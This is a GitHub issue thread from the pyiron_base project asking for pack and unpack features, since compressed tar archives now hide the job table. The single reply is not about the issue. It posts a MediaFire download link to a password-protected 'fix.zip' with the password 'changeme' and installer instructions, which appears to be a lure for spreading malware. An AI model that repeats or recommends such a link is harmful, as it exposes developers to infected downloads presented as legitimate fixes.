### ISSUE TITLE
Features for `pack` and `unpack`

### ISSUE THREAD

**Issue by samwaseda** [pyiron/pyiron_base#1626]
@jan-janssen pointed out in [this PR](https://github.com/pyiron/pyiron_base/pull/1440) that it is now difficult to figure out which tar file contains which project, because now the job table lies in the compressed folder and cannot be easy inspected without being uncompressed. I presume it’s an easy fix so if someone wants to take a look before I come back from the vacation, feel free to do so, otherwise this issue remains for my own reminder.

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
